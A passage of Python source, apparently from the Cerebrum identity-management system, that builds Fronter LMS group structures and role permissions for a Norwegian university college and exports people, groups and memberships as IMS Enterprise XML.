def __init__(self):
self._parent = None
@staticmethod
def load_acronyms(db):
result = dict()
ou = Factory.get("OU")(db)
const = Factory.get("Constants")()
for row in ou.search_name_with_language(
entity_type=const.entity_ou,
name_variant=const.ou_name_acronym,
name_language=const.language_nb):
ou.clear()
ou.find(row["entity_id"])
key = "%02d%02d%02d" % (ou.fakultet, ou.institutt, ou.avdeling)
result[key] = row["name"]
CfGroupInterface._acronym2avdeling = result
def __eq__(self, other):
return self.cf_id() == other.cf_id()
def __hash__(self):
return hash(self.cf_id())
def cf_group_type(self):
raise NotImplementedError("N/A")
def cf_id(self):
raise NotImplementedError("N/A")
def cf_title(self):
raise NotImplementedError("N/A")
def cf_parent_id(self):
raise NotImplementedError("N/A")
def cf_typevalue(self):
raise NotImplementedError("N/A")
def cf_template(self):
raise NotImplementedError("N/A")
@staticmethod
def kull_room_title(stprog, semester, year):
return "Rom for kull %s %s %s" % (stprog, semester, year)
def cf_parent_title(self):
"""Figure out the title of the group where self is a member"""
# If the parent link already exists, we are done
if self._parent:
return self._parent.cf_title()
# If not, let's guess
parent_id = self.cf_parent_id()
parent_components = parent_id.split(":")
if "klasse" in parent_components:
return "Rom for kull %s %s %s, klasse %s" % (
parent_components[-6],
parent_components[-3],
parent_components[-4],
parent_components[-1])
if "kull" in parent_components:
# fellesrom is for student-kull group's parent only ...
if self.cf_group_type() == "student-kull":
return self.kull_room_title(parent_components[-4],
parent_components[-1],
parent_components[-2])
# 2 possibilities here -- self is either a ROOM or a group with a
# kull role holder. In all cases the parent is the same - kull
# corridor. In either case the parent's name is deduced similarily.
#
idx = parent_components.index("kull")
return "Kull %s %s %s" % (
parent_components[idx-1], # stprog
parent_components[idx+2], # terminkode
parent_components[idx+1]) # arstall
elif "studieprogram" in parent_components:
idx = parent_components.index("studieprogram")
return "Studieprogram %s" % parent_components[idx+1].upper()
elif ("undenh" in parent_components or
"undakt" in parent_components):
# group's description (cf_title()) has the right semester number
# even for multisemester undenh/undakt, this structure will have
# the right title.
# FIXME: It is somewhat ugly to rely on a certain structure in
# group names
title_components = self.cf_title().split(" ")
return "Rom for " + " ".join(title_components[2:])
elif "emner" in parent_components:
idx = parent_components.index("emner")
return "Emnerom %s %s" % (parent_components[idx+2],
parent_components[idx+1])
# avdeling
elif len(parent_components) == 5 and parent_components[-1].isdigit():
return "%s" % self._acronym2avdeling[parent_components[-1]]
elif "automatisk" in parent_components:
return "Automatisk"
# for the sake of completeness
elif "manuell" in parent_components:
return "Manuell"
elif "persongruppene" in parent_components:
return "Samlenode for persongruppene"
elif parent_id == "root":
return "Oslofjordalliansen"
assert False, "This cannot happen: parent_id=%s" % parent_id
def cf_yield_siblings(self):
"""Return sibling node information to create alongside self.
This may come in handy when a creation of one node (be it
CfMemberGroup or cf_structure_group) necessarily entails creating
additional nodes at the same level.
By default, no action is performed. This method returns a generator.
"""
return ((cf_name, cf_id) for (cf_name, cf_id) in ())
@six.python_2_unicode_compatible
class CfStructureGroup(CfGroupInterface):
"""A group representing a structure (a room or a corridor) in CF.
This class deals with intergroup relations in CF (permissions,
parent-child relations, etc.). Some cf_structure_groups would have
CfMemberGroup(s) associated with them (typically student / FS role
holder groups). That association is used to grant access permissions in
CF.
"""
valid_types = ("STRUCTURE", "ROOM")
def __init__(self, description, cf_id, parent):
super(CfStructureGroup, self).__init__()
self._cf_id = cf_id
self._title = description
self._parent = parent
if self._parent:
self._parent.add_child(self)
self._structure_children = dict()
self._permissions = dict()
self._group_type = self._calculate_group_type()
def cf_typevalue(self):
"""Return a suitable text value for <typevalue> XML element.
The meaning of the code values is:
0 - node
1 - corridor
2 - group
4 - room.
"""
# FIXME: this is so horribly hackish. There should be a general way of
# calculating the <typevalue>.
if self.cf_id() in ("root",
"STRUCTURE:hiof.no",
"STRUCTURE:hiof.no:automatisk",
"STRUCTURE:hiof.no:manuell",
"STRUCTURE:hiof.no:persongruppene"):
return "0"
# avdeling -> node as per specification
components = self.cf_id().split(":")
if len(components) == 5 and components[-1].isdigit():
return "0"
# all other STRUCTURE entities are corridors
if self.cf_group_type() == "STRUCTURE":
return "1"
if self.cf_group_type() == "ROOM":
return "4"
assert False, "This cannot happen"
def cf_is_kull_fellesrom(self):
"""Is self fellesrom for a kull?"""
components = self.cf_id().split(":")
return (self.cf_group_type() == "ROOM" and
"kull" in components and
"klasse" not in components)
def cf_is_kull_corridor(self):
"""Is self a kull corridor?"""
components = self.cf_id().split(":")
return (self.cf_group_type() == "STRUCTURE" and
"kull" in components)
def fixup_sibling_permissions(self):
"""Propagate permissions from kullklasse roles to fellesrom for kull.
Those holdning role permissions on kullklasse room have the same
permission # set on kull room (fellesrommet for kullet)
"""
if not self.cf_is_kull_corridor():
return
# Does self have fellesrom at all? (it ought to, but let's pretend we
# need to check this)
holders = set()
fellesrom = None
for child in self.iterate_children(CfStructureGroup):
for permission in child.iterate_permissions():
if not permission.holder().cf_is_student_group():
holders.add(permission.holder())
if child.cf_is_kull_fellesrom():
fellesrom = child
# if we have fellesrom, every group in 'holders' gets a permission on
# fellesrom.
if fellesrom is None:
return
# let's go
for holder in holders:
logger.debug("%s receives additional permissions from sibling %s",
fellesrom, holder)
fellesrom.register_permissions(holder)
def cf_template(self):
assert self.cf_group_type() in self.valid_types
if self.cf_group_type() == "ROOM":
return "Mal-rom OA 2"
def cf_id(self):
return self._cf_id
def cf_title(self):
return self._title
def cf_group_type(self):
return self._group_type
def cf_parent_id(self):
"""Calculate which *structure* group is the parent of this group.
If the _parent link has already been established, there is nothing to
do. However, until the _parent link is set, we don't have the actual
parent node and have to calculate the id itself.
The idea is to figure out which parent structure group a given
structure group should be associated with. This happens during the
creation of the cf structure tree.
"""
# If the parent link already exists, we are done.
if self._parent:
return self._parent.cf_id()
# Now, which structure node is this?
components = self.cf_id().split(":")
if self.cf_group_type() == "ROOM":
# kullklasse
if "klasse" in components:
result = ["STRUCTURE", ] + components[1:-2]
# kull, fellesrom
elif "kull" in components:
result = ["STRUCTURE", ] + components[1:]
# The guesswork below is potentially incorrect (i.e. it will be
# incorrect for multisemester undenh/undakt. However, the
# proper remapping happens elsewhere, and this just captures the
# general case).
elif "undenh" in components:
result = ["STRUCTURE", ] + components[1:-4]
elif "undakt" in components:
result = ["STRUCTURE", ] + components[1:-5]
else:
assert False, "This cannot happen: self.id=%s" % self.cf_id()
return ":".join(result)
else:
# kull -> stprog
if "kull" in components:
result = components[:-3]
# stprog -> avdeling
elif "studieprogram" in components:
result = components[:-2]
# emnerom -> avdeling
elif "emner" in components:
result = components[:-3]
# avdeling -> automatisk
elif len(components) == 5 and components[-1].isdigit():
return "STRUCTURE:hiof.no:automatisk"
# root is special
elif self.cf_id() == "root":
return self.cf_id()
else:
assert False, "This cannot happen: self.id=%s" % self.cf_id()
return ":".join(result)
def _calculate_group_type(self):
"""Figure out what kind of structure group this is -- STRUCTURE
(corridor) or ROOM"""
# root is special. UNFORTUNATELY
if self.cf_id() == "root":
return "STRUCTURE"
components = self.cf_id().split(":")
assert components[0] in self.valid_types
return components[0]
def add_child(self, child):
self._structure_children[child.cf_id()] = child
# this will allow us to create parentless nodes, and have them fixed
# up later on. _parent slot is initialised to None.
if child._parent != self:
child._parent = self
def iterate_children(self, child_type=None):
for child in self._structure_children.itervalues():
if child_type is None or isinstance(child, child_type):
yield child
def iterate_permissions(self):
return self._permissions.itervalues()
def register_permissions(self, cf_group):
assert isinstance(cf_group, CfMemberGroup)
permission = cf_group.get_cf_permission(self)
if permission is not None:
self._permissions[cf_group.cf_id()] = permission
logger.debug("Registered permission %s", permission)
def __str__(self):
return ("CFSG id=%s (parent=%s), %d structure members, "
"%d perm groups" % (
self.cf_id(),
self._parent and self._parent.cf_id() or "No parent",
len(self._structure_children),
len(self._permissions)))
@six.python_2_unicode_compatible
class CfMemberGroup(CfGroupInterface):
"""A group holding members of a Cerebrum group for CF.
All cf_member_groups are 'associated' with a cf_structure_group and
cf_member_groups are meant to capture user members, whereas
cf_structure_group captures the overall structure group.
This class deals with member management and storing member attributes to
export to CF (unames, e-mails, etc)
"""
# FS role groups
valid_types = ("stprog", "kull", "kullklasse", "undenh", "undakt",
"avdeling",
# FS student groups
"student-undenh", "student-undakt",
"student-kull", "student-kullklasse",)
def __init__(self, group):
super(CfMemberGroup, self).__init__()
self._cf_id = group.group_name
self._title = group.description
self._account_ids = [x["member_id"]
for x in group.search_members(
group_id=group.entity_id)]
self._group_type = self._calculate_group_type()
self._parent = None
assert self._group_type in self.valid_types, \
"Cannot deduce type for group id=%s/name=%s: type=%s" % (
group.entity_id,
group.group_name,
self._group_type)
def cf_typevalue(self):
"""Return a suitable text value for <typevalue> XML element.
The meaning of the code values is:
0 - node
1 - corridor
2 - group
4 - room.
"""
# CfMemberGroup objects represent 'group' typevalues. Always.
return "2"
def cf_id(self):
return self._cf_id
def cf_title(self):
return self._title
def cf_group_type(self):
return self._group_type
def cf_is_student_group(self):
return self.cf_group_type() in ("student-undenh",
"student-undakt",
"student-kull",
"student-kullklasse",)
def cf_parent_id(self):
"""Calculate which *structure* group this member group corresponds to.
The idea is to figure out which structure group a given member group
should be associated with. Member groups are 'extracted' directly from
Cerebrum, whereas structure groups will have to be deduced.
"""
if self._parent is not None:
return self._parent.cf_id()
group_type2cf_structure_fixup = {
"student-undenh": ("ROOM", -1),
"student-undakt": ("ROOM", -1),
"student-kull": ("ROOM", -1),
"student-kullklasse": ("ROOM", -1),
"undenh": ("ROOM", -2),
"undakt": ("ROOM", -2),
"kullklasse": ("ROOM", -2),
"kull": ("STRUCTURE", -2),
"stprog": ("STRUCTURE", -2),
"avdeling": ("STRUCTURE", -2),
}
member_group_type = self.cf_group_type()
if member_group_type in group_type2cf_structure_fixup:
prefix, last = group_type2cf_structure_fixup[member_group_type]
components = self.cf_id().split(":")
return ":".join([prefix, ] + components[:last])
else:
assert False, "This cannot happen: cf_member id=%s/type=%s" % (
self.cf_id(), member_group_type)
def cf_yield_siblings(self):
if self.cf_group_type() != "kull":
return
# Holding a role with 'kull' implies that the corresponding
# ROOM/Felles:...:kull MUST be created.
components = self.cf_id().split(":")
k_title = self.kull_room_title(components[5], # stprog
components[8], # semester
components[7]) # year
k_id = ":".join(["ROOM", ] + components[:-2])
for cf_name, cf_id in ((k_title, k_id),):
yield cf_name, cf_id
def _role_code(self):
"""What kind of role code does self correspond to?
This makes sense for role groups only (i.e. NOT student-groups)
"""
components = self.cf_id().split(":")
assert "rolle" in components
for marker in ("assistent", "hovedlærer", "kursansv", "lærer",
"kontakt", "veileder", "admin",):
if marker in components:
return marker
assert False, \
"Impossible: unknown role code for cd id=%s" % self.cf_id()
def get_cf_permission(self, structure_group):
"""Calculate permission for self on L{structure_group}.
The calculations are a bit involved, since the permission in question
depends on both self AND structure_group.
"""
all_read = {
"stprog": CfPermission.ROLE_READ,
"kull": CfPermission.ROLE_READ,
"kullklasse": CfPermission.ROLE_READ,
"undenh": CfPermission.ROLE_READ,
"undakt": CfPermission.ROLE_READ,
"avdeling": CfPermission.ROLE_READ,
}
all_write = {
"stprog": CfPermission.ROLE_WRITE,
"kull": CfPermission.ROLE_WRITE,
"kullklasse": CfPermission.ROLE_WRITE,
"undenh": CfPermission.ROLE_WRITE,
"undakt": CfPermission.ROLE_WRITE,
"avdeling": CfPermission.ROLE_WRITE,
}
all_delete = {
"stprog": CfPermission.ROLE_DELETE,
"kull": CfPermission.ROLE_DELETE,
"kullklasse": CfPermission.ROLE_DELETE,
"undenh": CfPermission.ROLE_DELETE,
"undakt": CfPermission.ROLE_DELETE,
"avdeling": CfPermission.ROLE_DELETE,
}
all_change = {
"stprog": CfPermission.ROLE_CHANGE,
"kull": CfPermission.ROLE_CHANGE,
"kullklasse": CfPermission.ROLE_CHANGE,
"undenh": CfPermission.ROLE_CHANGE,
"undakt": CfPermission.ROLE_CHANGE,
"avdeling": CfPermission.ROLE_CHANGE,
}
role_code2permission = {
"assistent": all_read,
"hovedlærer": all_change,
"kursansv": all_write,
"lærer": all_delete,
"kontakt": all_read,
"veileder": all_write,
"admin": {
"stprog": CfPermission.ROLE_CHANGE,
"kull": CfPermission.ROLE_CHANGE,
"kullklasse": CfPermission.ROLE_CHANGE,
"undenh": CfPermission.ROLE_WRITE,
"undakt": CfPermission.ROLE_WRITE,
"avdeling": CfPermission.ROLE_CHANGE,
},
}
recursive = False
if self.cf_group_type() in ("stprog", "kull", "avdeling"):
recursive = True
if self.cf_group_type() in ("student-undenh", "student-undakt",
"student-kullklasse", "student-kull",):
access_type = CfPermission.ROLE_WRITE
elif self.cf_group_type() in ("undenh", "undakt", "kullklasse",
"kull", "stprog", "avdeling",):
# These are the perms stemming from FS roles. We have to look at
# the specific role
role_code = self._role_code()
access_type = role_code2permission[role_code][self.cf_group_type()]
else:
logger.debug("Weird group type for %s", self)
assert False, "This cannot happen"
perm_object = CfPermission(access_type, recursive,
holder=self,
target=structure_group)
return perm_object
def _calculate_group_type(self):
"""Figure out what kind of group this is."""
suffix_map = {"undenh": "undenh",
"undakt": "undakt",
"klasse": "kullklasse",
"studieprogram": "stprog",
"kull": "kull", }
components = self.cf_id().split(":")
if "student" in components:
# don't reshuffle the list (the tests have to be performed in a
# specific order)
for marker in ("undenh", "undakt", "klasse", "kull",):
if marker in components:
return "student-" + suffix_map[marker]
assert False, "This is impossible - no type for %s" % self.cf_id()
elif "rolle" in components:
for marker in ("undakt", "undenh",
"klasse", "kull", "studieprogram"):
if marker in components:
return suffix_map[marker]
if (len(components) == 6 and
re.search(r"^\d\d0000$", components[3])):
return "avdeling"
assert False, "NOTREACHED"
def __str__(self):
return "CFMG type=%s id=%s %d members" % (self.cf_group_type(),
self.cf_id(),
len(self._account_ids))
def iterate_members(self):
return iter(self._account_ids)
class CfMembers(object):
"""A class to keep track of person information in CF.
Technically, this class is superfluous. However, we can cache a lot of
information about people in order to speed up the output. All that caching
is contained within this class. The only interface available is
L{member_info}, which looks up all the necessary info by account_id.
"""
def __init__(self, db):
self.db = db
self.const = Factory.get("Constants")(db)
def account2uname(self):
"""Construct a mapping from account_id to account_name.
"""
account = Factory.get("Account")(self.db)
result = dict()
for row in account.list_names(self.const.account_namespace):
result[row["entity_id"]] = row["entity_name"] + uname_suffix
return result
def email2mail_server(self, email):
# This can't be the right way...
try:
ea = EmailAddress(self.db)
ea.find_by_address(email)
et = EmailTarget(self.db)
et.find(ea.get_target_id())
es = EmailServer(self.db)
es.find(et.get_server_id())
return es.name
except Errors.NotFoundError:
return ""
def person2address(self, person_id):
person = Factory.get("Person")(self.db)
person.find(person_id)
def remap(x):
if x is None:
return six.text_type()
return six.text_type(x).strip()
for source_system in (self.const.system_sap,
self.const.system_fs):
for addr_type in (self.const.address_post,
self.const.address_street):
addr = person.get_entity_address(source=source_system,
type=addr_type)
if len(addr) == 1:
addr = addr[0]
return {"street": remap(addr["city"]), }
# "pobox": remap(addr["p_o_box"]),
# FIXME: IMS limits this field to 128 chars. This
# should be enforced and split into multiple <=128
# char chunks.
# hiof requests city part only.
# According to Fronter, 'locality' is not
# supported yet (2009-08-18), and we are asked to
# use "street", although city-part should be in
# 'locality' if IMS Ent is followed
def member_info(self):
"""Slurp in info about all members.
There is a bit of dict-building in this method. That takes time.
@rtype: dict (int -> dict (str -> str))
@return:
A dictionary from account_ids to dicts with the corresponding
information. The following keys are available:
- full (account owner's name)
- first (account owner's first name)
- family (account owner's last name)
- email (email address associated with account)
- user (uname@<suffi>)
- imap-server (imap server associated for email)
- address (a dict representing account owner's address)
- mobile (account owner's mobile work number from SAP)
"""
account = Factory.get("Account")(self.db)
person = Factory.get("Person")(self.db)
const = self.const
result = dict()
logger.debug("Caching e-mail addresses")
uname2mail = account.getdict_uname2mailaddr()
logger.debug("%d uname -> e-mail mappings", len(uname2mail))
logger.debug("Caching member names")
person_id2name = person.getdict_persons_names(
source_system=const.system_cached,
name_types=[const.name_first, const.name_full, const.name_last])
logger.debug("%d person_id -> name mappings", len(person_id2name))
logger.debug("Caching mobile phone numbers")
person_id2phone = dict((int(x["entity_id"]), x["contact_value"])
for x in person.list_contact_info(
contact_type=const.contact_mobile_phone,
entity_type=const.entity_person,
source_system=const.system_sap))
logger.debug("Caching complete user records")
candidates = account.search(owner_type=const.entity_person)
logger.debug("%d candidates to consider", len(candidates))
for row in candidates:
person_id = row["owner_id"]
uname = row["name"]
account_id = row["account_id"]
if uname not in uname2mail:
logger.debug(
"Ignoring id=%s/uname=%s (person_id=%s): no e-mail",
account_id, uname, person_id)
continue
email_address = uname2mail[uname]
if person_id not in person_id2name:
logger.debug(
"Ignoring id=%s/uname=%s (person_id=%s): no name info",
account_id, uname, person_id)
continue
first_name = person_id2name[person_id].get(const.name_first, "")
full_name = person_id2name[person_id].get(const.name_full, "")
family_name = person_id2name[person_id].get(const.name_last, "")
result[account_id] = {
"full": full_name,
"first": first_name,
"family": family_name,
"email": email_address,
"user": uname + uname_suffix,
"imap-server": self.email2mail_server(email_address),
"imap-user": uname,
"address": self.person2address(person_id),
"mobile": person_id2phone.get(person_id)
}
logger.debug("Collected a total of %d user records", len(result))
return result
def collect_cf_groups(db):
"""Collect all CF groups from Cerebrum."""
group = Factory.get("Group")(db)
const = Factory.get("Constants")()
result = set(r["entity_id"] for r in
group.list_traits(code=const.trait_cf_group))
logger.debug("Collected %d CF groups from Cerebrum", len(result))
return result
def locate_db_group(db, group_id):
"""Create a Group proxy for the specified group_id.
"""
group = Factory.get("Group")(db)
group.find(group_id)
return group
def build_cf_tree(db, db_groups, multisemester_map):
"""Construct a complete CF tree with all groups and permissions.
@param db:
A database proxy.
@param db_groups:
Complete list of cerebrum group_ids which are the basis for CF
population.
"""
CfGroupInterface.load_acronyms(db)
tree = CfTree(db)
for group_id in db_groups:
db_group = locate_db_group(db, group_id)
cf_member = CfMemberGroup(db_group)
tree.register_member_group(cf_member)
logger.debug("Created CF group %s", cf_member)
# Now that we have the group node, we create the corresponding
# structure nodes (all of them).
node = tree.create_associated_structures(cf_member, multisemester_map)
if node:
logger.debug(
"Created assoc structures for cf_member id=%s. "
"Parent node is id=%s", cf_member.cf_id(), node.cf_id())
node.register_permissions(cf_member)
else:
logger.debug("No node created for cf_member id=%s",
cf_member.cf_id())
# fixup additional permissions between the siblings of each node, since
# the permission assignment up to this point has been top-down.
for group in tree.iterate_groups(CfStructureGroup):
group.fixup_sibling_permissions()
logger.debug("Built a CF tree")
return tree
def open_xml_stream(filename):
"""Open the xml file for writing.
@return:
Return an xmlprinter instance ready for output.
"""
sink = SimilarSizeWriter(filename, "wb")
sink.max_pct_change = 50
printer = xmlprinter.xmlprinter(sink,
indent_level=2,
data_mode=1,
input_encoding="utf-8")
logger.debug("Opened %s for XML output", filename)
return printer
def output_fixed_header(printer):
printer.startElement("properties")
printer.dataElement("datasource", "cerebrum@hiof.no")
printer.dataElement("datetime", datetime.date.today().strftime("%Y-%m-%d"))
printer.endElement("properties")
def output_source_element(printer):
printer.dataElement("source", "cerebrum@hiof.no")
def output_id(id_data, printer):
printer.startElement("sourcedid")
output_source_element(printer)
printer.dataElement("id", id_data)
printer.endElement("sourcedid")
def output_person_auth(data, printer):
# "ldap3:" - ldap authentication (3 is probably the server number)
# "1" for pwencryptiontype means md5
# "5" means authentication via ldap
printer.dataElement("userid", data["user"],
{"password": "ldap3:", "pwencryptiontype": "5", })
def output_person_names(data, printer):
printer.startElement("name")
printer.dataElement("fn", data["full"])
printer.startElement("n")
if data.get("first"):
printer.dataElement("given", data["first"])
if data.get("family"):
printer.dataElement("family", data["family"])
printer.endElement("n")
printer.endElement("name")
def output_email_info(data, printer):
for required_key in ("imap-server", "imap-user",):
if not data.get(required_key):
return
printer.startElement("extension")
# The magic keys/values below have been suggested by Fronter.
printer.emptyElement("emailsettings",
{"description": "HiO e-post",
"imap_serverdirectory": "mail/",
"imap_sentfolder": "INBOX.Sent",
"imap_draftfolder": "INBOX.Drafts",
"imap_trashfolder": "INBOX.Trash",
# According to Fronter, this value means use the same
# password as for logging into fronter.
"mail_password": "FRONTERLOGIN",
"mail_username": data["imap-user"],
"mailtype": "1",
"use_ssl": "1",
"defaultmailbox": "1",
"on_delete_action": "trash",
"is_primary": "1",
"mailserver": data["imap-server"]})
printer.endElement("extension")
def output_person_address(data, printer):
if not data.get("address"):
return
address = data["address"]
# No non-empty address field. That happens sometimes.
if not [x for x in address.itervalues() if bool(x)]:
return
printer.startElement("adr")
for key in address:
value = address[key]
if value:
printer.dataElement(key, value)
printer.endElement("adr")
def output_person_phone(data, printer):
if not data.get("mobile"):
return
# 3 means mobile phone in the IMS specification
printer.dataElement("tel", data["mobile"], {"teltype": "3"})
def output_person_element(data, printer):
"""Output all relevant data for a <person> element.
"""
printer.startElement("person", {"recstatus": STATUS_ADD})
output_id(data["user"], printer)
output_person_auth(data, printer)
printer.dataElement("email", data["email"])
output_person_names(data, printer)
output_email_info(data, printer)
output_person_address(data, printer)
output_person_phone(data, printer)
printer.endElement("person")
def output_people(db, tree, printer):
"""Output information about all people mentioned in at least one group in
tree.
The information has already been prepared by the corresponding nodes. The
only thing we need is to make sure that the same person is not output
twice.
"""
logger.debug("Outputting all people registered in the CF-tree (in-memory)")
member_info = CfMembers(db).member_info()
processed = set()
for group in tree.iterate_groups(CfMemberGroup):
processed.update(group.iterate_members())
# We want to output the users sorted by id for the ease of by-human
# comparison.
for member_id in sorted(processed):
xml_data = member_info.get(member_id)
if xml_data is None:
logger.warn("No data about account_id=%s", member_id)
continue
output_person_element(xml_data, printer)
def output_group_element(cf_group, printer, member_group_owner):
"""Output all info pertaining to the specific cf_group"""
printer.startElement("group", {"recstatus": STATUS_ADD, })
output_id(cf_group.cf_id(), printer)
printer.startElement("grouptype")
printer.dataElement("scheme", "FronterStructure1.0")
printer.emptyElement("typevalue", {"level": cf_group.cf_typevalue()})
printer.endElement("grouptype")
printer.startElement("description")
if len(cf_group.cf_title()) > 60:
# printer.emptyElement("short")
printer.dataElement("long", cf_group.cf_title())
else:
printer.dataElement("short", cf_group.cf_title())
printer.endElement("description")
printer.startElement("relationship", {"relation": "1"})
if isinstance(cf_group, CfMemberGroup):
output_id(member_group_owner, printer)
else:
output_id(cf_group.cf_parent_id(), printer)
printer.emptyElement("label")
printer.endElement("relationship")
printer.endElement("group")
def output_member_groups(db, tree, printer):
"""Output all group information about the structures we are building in
CF.
db is passed along for completeness. It's unused here.
"""
member_owner = tree._person_group_holder.cf_id()
for cf_group in tree.iterate_groups_topologically():
output_group_element(cf_group, printer, member_owner)
def output_user_membership(group, members, printer):
"""Output XML subtree for the specific membership."""
printer.startElement("membership")
output_id(group.cf_id(), printer)
for member in members:
printer.startElement("member")
output_id(member, printer)
# 1 = person, 2 = group
printer.dataElement("idtype", "1")
printer.startElement("role", {"recstatus": STATUS_ADD,
# FIXME: This should be expressed via
# cf_permission, since a specific user
# within a group may have a different
# permission.
"roletype": CfPermission.ROLE_WRITE})
# 0 = inactive member, 1 = active member
printer.dataElement("status", "1")
# FIXME: What does this junk mean? Alle person members seem to have
# this memberof extension with type=2. This is a blind copy from
# UiO/UiA.
printer.startElement("extension")
printer.emptyElement("memberof", {"type": "2"})
printer.endElement("extension")
printer.endElement("role")
printer.endElement("member")
printer.endElement("membership")
def output_user_memberships(db, tree, printer):
"""Output all user membership information."""
account2uname = CfMembers(db).account2uname()
for group in tree.iterate_groups(CfMemberGroup):
members = [account2uname[x] for x in group.iterate_members()]
if not members:
continue
output_user_membership(group, members, printer)
def output_viewcontacts(target, permission_holders, printer):
"""Helper function to output viewContacts permissions"""
printer.startElement("membership")
output_id(target.cf_id(), printer)
for gm in permission_holders:
printer.startElement("member")
output_id(gm.cf_id(), printer)
# 1 = person, 2 = group
printer.dataElement("idtype", "2")
printer.startElement("role", {"recstatus": STATUS_ADD})
# 0 = inactive member, 1 = active member
printer.dataElement("status", "1")
printer.startElement("extension")
printer.emptyElement("groupaccess", {"roomAccess": "0",
"contactAccess": "100", })
printer.endElement("extension")
printer.endElement("role")
printer.endElement("member")
printer.endElement("membership")
def process_viewcontacts_permissions(cf_group, local_permissions,
inherited_permissions, printer):
"""Generate XML for represeting viewContacts permissions related to
cf_group.
This is where it gets hairy.
"""
assert isinstance(cf_group, CfStructureGroup)
# This methods is called with cf_group == cf_structure_group. Always
#
# So, for each such cf_structure_group we need to locate the corresponding
# cf_member_groups. Some of them are direct children of cf_group. Other
# are permission holders in local_ or inherited_permissions. NB!
# isinstance(x.holder(), CfMemberGroup) for x in permissions MUST BE
# True.
#
local_member_groups = set(cf_group.iterate_children(CfMemberGroup))
local_nonstudents = set(x for x in local_member_groups
if not x.cf_is_student_group())
local_permission_holders = set(x.holder() for x in
local_permissions
if isinstance(x.holder(), CfMemberGroup))
inherited_permission_holders = set(
x.holder() for x in inherited_permissions if
isinstance(x.holder(), CfMemberGroup))
all_at_this_level = set().union(
local_member_groups).union(
local_permission_holders).union(
inherited_permission_holders)
all_nonstudent = set(x for x in all_at_this_level
if not x.cf_is_student_group())
logger.debug("ViewContacts at level %s: %d local (%d non-student); "
"%d local perm holders, %d inherited perm holders "
"%d total at this level",
cf_group.cf_id(),
len(local_member_groups),
len(local_nonstudents),
len(local_permission_holders),
len(inherited_permission_holders),
len(all_at_this_level))
# If there are no /member/ groups at this level, then there are no
# viewContacts permissions to hand out. This means that our job is done.
if not local_member_groups:
return
student_member_group = [x for x in local_member_groups
if x.cf_is_student_group()]
assert len(student_member_group) <= 1
if student_member_group:
student_member_group = student_member_group[0]
else:
student_member_group = None
# Case 1: *Everybody* has viewContacts on the student group
if student_member_group:
output_viewcontacts(student_member_group, all_at_this_level, printer)
logger.debug(
"%s is a student group and %s groups have viewContacts on it",
student_member_group.cf_id(),
len(all_at_this_level))
# Case 2: Every nonstudent group at this level has viewContacts on every
# local nonstudent group
for g in local_nonstudents:
output_viewcontacts(g, all_nonstudent, printer)
logger.debug("%s is local non-student group and %s groups have "
"viewContact on it", g.cf_id(), len(all_nonstudent))
# Case 3: Finally, every local nonstudent group has viewContacts on
# inherited permission holders. (i.e. local "LÆRER" will have viewContacts
# on inherited "ADMIN")
for g in inherited_permission_holders:
output_viewcontacts(g, local_nonstudents, printer)
logger.debug("%s is an inherited permission group and %s local groups"
"have viewContact on it",
g.cf_id(), len(local_nonstudents))
def output_node_permissions(cf_group, local_permissions,
inherited_permissions, printer):
"""Generate XML for representing permissions on cf_group.
permissions is a sequence of cf_permission instances that list permissions
(direct or indirect) on cf_group. I.e. there may be entries in permissions
that have target != cf_group.
"""
permissions = local_permissions + inherited_permissions
# No permissions -> nothing to do
if len(permissions) == 0:
logger.debug("No permissions output for group id=%s",
cf_group.cf_id())
return
logger.debug("cf_group id=%s has %d local and %d inherited permissions",
cf_group.cf_id(), len(local_permissions),
len(inherited_permissions))
printer.startElement("membership")
output_id(cf_group.cf_id(), printer)
for permission in permissions:
printer.startElement("member")
output_id(permission.holder().cf_id(), printer)
# 1 = person, 2 = group
printer.dataElement("idtype", "2")
printer.startElement("role", {"recstatus": STATUS_ADD,
"roletype": permission.access_type(), })
# FIXME: what about <extension><memberof type="??"></extension> ?
# 0 = inactive, 1 = active member
printer.dataElement("status", "1")
printer.endElement("role")
printer.endElement("member")
printer.endElement("membership")
def process_node_permissions(node, inherited_permissions, printer):
"""Output permissions for the CF subtree with root at node.
Permissions are generated in depth-first order down the tree.
@type node: cf_structure_group instance
@param node:
Subtree root for which we generate permission data. I.e. other
structures have permissions on L{node}.
@type inherited_permissions: sequence of cf_permission instances.
@param inherited_permissions:
Sequence of permissions inherited by this node from its parents. Some
groups result in recursive permissions. E.g. an 'admin' role given for a
'stprog' is *inherited* for all structures associated with that 'stprog'
(kull and kullklasse). Should node have its own recursive permissions,
they are added to inherited_permissions.
"""
#
# There is a bit of tuple copying here; hopefully this won't be a
# performance issue.
#
children = node.iterate_children(CfStructureGroup)
local_permissions = tuple(node.iterate_permissions())
output_node_permissions(node, local_permissions, inherited_permissions,
printer)
process_viewcontacts_permissions(node, local_permissions,
inherited_permissions, printer)
node_recursive_permissions = tuple(x for x in local_permissions
if x.is_recursive())
children_permissions = inherited_permissions + node_recursive_permissions
for child in children:
process_node_permissions(child, children_permissions, printer)
def output_permissions(tree, printer):
"""Output all permissions.
Permissions are expressed in IMS enterprise through memberships, much like
output_membership. However, in this case groups are members of other
groups (groups-with-user-members are members of STRUCTURE/ROOM groups).
"""
root = tree.get_root()
process_node_permissions(root, tuple(), printer)
def generate_xml_file(filename, db, tree):
"""'Flatten' cf_tree to L{filename}.
'Flattening' is accomplished in several steps:
* output people
* output all groups
* output all memberships
* output all permissions
"""
printer = open_xml_stream(filename)
printer.startDocument("utf-8")
printer.startElement("enterprise")
output_fixed_header(printer)
output_people(db, tree, printer)
output_member_groups(db, tree, printer)
output_user_memberships(db, tree, printer)
output_permissions(tree, printer)
printer.endElement("enterprise")
printer.endDocument()
printer.fp.close()
def build_multisemester_mapping(undenh_file, undakt_file):
"""Build a dict to remap multisemester (flersemester) entities.
This function helps to go from a group_name in Cerebrum for
undenh/undakt-related groups to the structure id of the node in the
Fronter tree. I.e. we want to assist remapping
hiof.no:fs:224:400000:emner:2008:vår:undakt:HSS40505:1:1:0
to
STRUCTURE:hiof.no:fs:224:400000:emner:2009:vår
... if the first one is the start semester for an undakt in its 3rd active
semester.
@rtype: dict of str to str
@return:
A mapping built for all multisemester entries in the files. Since both
undenh and undakt have the same structure parent, the mappings are built
like this:
'ROOM:hiof.no:fs:224:400000:emner:2008:vår:undakt:HSS40505:1:1:0' ->
'STRUCTURE:hiof.no:fs:224:400000:emner:2009:vår'
... where 2008/vår-components are 'counted back' (see
populate_fronter_groups._count_back_semester) from the data in
undenh/undakt file.
"""
